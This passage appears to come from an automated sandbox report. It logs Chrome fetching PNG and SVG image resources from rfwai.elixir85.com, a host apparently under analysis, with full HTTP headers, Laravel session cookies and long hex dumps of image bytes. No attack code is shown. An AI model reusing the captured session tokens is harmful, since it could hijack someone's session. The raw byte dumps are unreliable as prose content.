                                                        2024-07-03 19:07:25 UTC1369INData Raw: e9 f3 67 ce 34 f9 1e 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38 6d dd be 9d 9b 34 61 02 15 e7 e7 57 0b cb 97 2f 13 ad ad 9a 62 f6 29 29 96 33
                                                        Data Ascii: g4L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8m4aW/b))3
                                                        2024-07-03 19:07:25 UTC158INData Raw: bb 7c 1e 0f ee dc 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55
                                                        Data Ascii: |FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        82192.168.2.549815104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:25 UTC1122OUTGET /ophQfOAKqa13061H23eI96MwQ1iF0kZmnaRI3dvE34mhKSmU3i9C67140 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:25 UTC657INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:25 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 727
                                                        Connection: close
                                                        Content-Disposition: inline; filename="ophQfOAKqa13061H23eI96MwQ1iF0kZmnaRI3dvE34mhKSmU3i9C67140"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WYuQZ5CuG9tFfC9at5DsYRIDm4ul%2FtgNW2Ic6CdX1IaQI%2Fw0j%2F3IF%2BLbi6qCoB6axXF3k%2BVIZej1sQ%2FAkboVz%2BsrOaJV8P5BofAXzg8UHO9y5Y0lkixezzsT75YTHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d92889d8a04223-EWR
                                                        2024-07-03 19:07:25 UTC712INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                        Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\
                                                        2024-07-03 19:07:25 UTC15INData Raw: f8 53 a2 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: SIENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        83192.168.2.549818104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:25 UTC1122OUTGET /mnn8U5yVMoEYzlOfgNnAivXZ1CIQzlLocVuvEshLSY4IQMWWAxbx90145 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:26 UTC660INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:26 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="mnn8U5yVMoEYzlOfgNnAivXZ1CIQzlLocVuvEshLSY4IQMWWAxbx90145"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mmUk6BRRdr2CrznwfLNVfyis3hY6s34kGxTFIi%2BcCT17xjr%2FZ25MSMQ9OftxQ88uqadpVRWsNOMconB3j72KisK1b%2BrtIY3xksqzBL8r3v8x3QIrF1omsMPUHvJBnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d9288bbb49432e-EWR
                                                        2024-07-03 19:07:26 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                        Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                        2024-07-03 19:07:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        84192.168.2.549816104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:25 UTC1462OUTGET /uvrkTtrGLzA9nOtO0uRNX2ukFXM6ttnWjIo6De4Rue8U5rkmnqqgYjP3dvGgTUnVi3jY1Cegh254 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:26 UTC674INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:26 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 70712
                                                        Connection: close
                                                        Content-Disposition: inline; filename="uvrkTtrGLzA9nOtO0uRNX2ukFXM6ttnWjIo6De4Rue8U5rkmnqqgYjP3dvGgTUnVi3jY1Cegh254"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VBCiAueCdOb5zMTNWD%2BJb3U3HOCDUIYscilXOsCUze8TY9FOeEmUc0z%2FbhMZkBi2jT%2FjiHxM1yGM5dprQJcNqpLMEqKUJ0YNS4ih%2B7s0pYVNuVls9wr%2FkuBLrK9JMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d9288bbf638c93-EWR
                                                        2024-07-03 19:07:26 UTC695INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                        Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:26 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:26 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:26 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:26 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:26 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:26 UTC1369INData Raw: 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:26 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:26 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:26 UTC1369INData Raw: 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        85192.168.2.549819104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:25 UTC1110OUTGET /ijg96tfwHavl6dODlGNgwxFtzlAssOTwlMZqK1Qg56170 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
